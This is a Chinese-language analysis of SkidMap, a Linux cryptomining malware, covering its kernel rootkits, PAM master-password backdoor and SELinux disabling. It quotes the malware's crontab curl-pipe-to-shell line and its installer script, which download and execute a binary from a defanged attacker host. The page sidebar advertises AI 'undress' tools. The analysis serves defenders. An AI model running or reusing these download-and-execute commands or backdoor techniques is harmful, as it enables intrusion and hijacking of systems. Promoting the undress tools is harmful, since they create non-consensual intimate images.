搜尋
首頁運維安全如何進行Linux惡意軟體SkidMap分析

挖掘加密貨幣惡意軟體仍然是一個普遍的威脅。網路罪犯也越來越多地探索新的平台和方法來進一步利用挖礦惡意軟體——從行動裝置、Unix和類別Unix系統到伺服器和雲端環境。

攻擊者不斷提升惡意軟體抵禦偵測的能力。例如,將惡意軟體與看門狗元件捆綁在一起,以確保非法的加密貨幣挖礦活動在受感染的機器中持續存在,或基於Linux的系統,利用基於LD_PRELOAD-based的rootkit使其元件無法被系統檢測到。

最近發現了一個叫做SkidMap的Linux惡意軟體,它顯示了加密貨幣挖礦威脅越來越複雜的趨勢。該惡意軟體引起了人們的關注,原因在於它以一種載入惡意核心模組的方式進行操作,從而不容易被察覺。

與使用者模式的rootkit相比,這些核心模式的rootkit不僅更難偵測,攻擊者還可以使用它們來獲得對受影響系統的存取權限。 Skidmap能夠設定一個主密碼,使其能夠存取系統中的所有使用者帳戶。 SkidMap的許多例程都需要根訪問,SkidMap使用的攻擊向量(無論是透過漏洞攻擊、錯誤配置)很可能與向攻擊者提供對系統的根訪問或管理訪問的攻擊向量相同。

如何進行Linux惡意軟體SkidMap分析

Skidmap感染鏈

惡意軟體透過crontab將自身安裝到目標電腦上,如下所示:

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

然後,安裝腳本pm.sh下載主二進位檔案「pc」:

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else
   url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

執行「PC」二進位檔案後,將變更削弱受影響機器的安全設定。當檔案/usr/sbin/setenforce存在時,惡意軟體可以使用指令setenforce 0進行執行。如果系統有/etc/selinux/config文件,它會將這些命令寫入檔案:selinux=disabled和selinux=targeted命令。第一種做法是停用selinux策略或阻止其加載,第二種做法是將指定進程設為受限域中運行。

SkidMap還提供了後門,透過讓二進位檔案將其處理程序的公鑰新增至authorized_keys檔案來實現,該檔案包含身份驗證所需的金鑰。

SkidMap提供了另一種攻擊者可以進入機器的方式,除了使用後門。惡意軟體以自己的惡意版本(偵測為backdoor.linux.pamdor.a)取代系統的pam_unix.so檔案(負責標準unix驗證的模組)。如圖2所示,此惡意pam_unix.so檔案接受任何使用者的特定密碼,從而允許攻擊者以電腦中的任何使用者身分登入。

SkidMap加密貨幣

「pc」二進位檔案檢查受感染系統的作業系統是debian還是rhel/centos。

對於基於debian的系統,它將cryptocurrency miner的有效負載降到/tmp/miner2。對於centos/rhel系統,它將從url hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz下載一個tar文件,該文件包含cryptocurrency miner及其多個組件,然後將其解壓縮並安裝。

如何進行Linux惡意軟體SkidMap分析

SkidMap其他惡意元件

惡意軟體元件旨在進一步混淆其惡意活動並確保它們繼續運行:

1、一個偽“rm”二進位檔案:tar檔案中包含的一個元件是一個偽“rm”二進位文件,它將取代原始的檔案(rm通常用作刪除檔案的指令)。此檔案設定一個惡意cron作業,該作業將下載並執行一個檔案。

安裝kaudited時,請將/usr/bin/kaudited檔案安裝。多個可載入核心模組(LKM)被安裝到受感染的電腦上的該二進位檔案。為了防止受感染的電腦在遭遇核心模式rootkits時崩潰,它會針對特定的核心版本使用不同的模組。 kaudited二進位檔案也刪除了一個監視程式元件。

如何進行Linux惡意軟體SkidMap分析

3、iproute,該模組鉤住系統呼叫getdents(通常用於讀取目錄的內容)以隱藏特定的檔案。

如何進行Linux惡意軟體SkidMap分析

4、netlink,偽造網路流量和cpu相關的統計,使受感染機器的CPU負載始終看起來很低。

如何進行Linux惡意軟體SkidMap分析

解決方案

SkidMap使用相當先進的方法來確保它及其元件不被發現。 SkidMap可以以多種方式存取受影響的機器,從而重複感染已被恢復或清除的系統。

挖礦加密貨幣不僅會影響伺服器和工作站的效能,導致更高的開支,甚至還會幹擾業務。考慮到Linux在許多企業環境中的使用,使用者和管理員應保持系統和伺服器的更新和修補;謹防未經驗證的第三方儲存庫;防止惡意檔案或進程運作。

IoCs

如何進行Linux惡意軟體SkidMap分析

以上是如何進行Linux惡意軟體SkidMap分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:亿速云。如有侵權,請聯絡admin@php.cn刪除

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

熱工具

SecLists

SecLists

SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。

Dreamweaver Mac版

Dreamweaver Mac版

視覺化網頁開發工具

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。

SublimeText3 英文版

SublimeText3 英文版

推薦:為Win版本,支援程式碼提示!

WebStorm Mac版

WebStorm Mac版

好用的JavaScript開發工具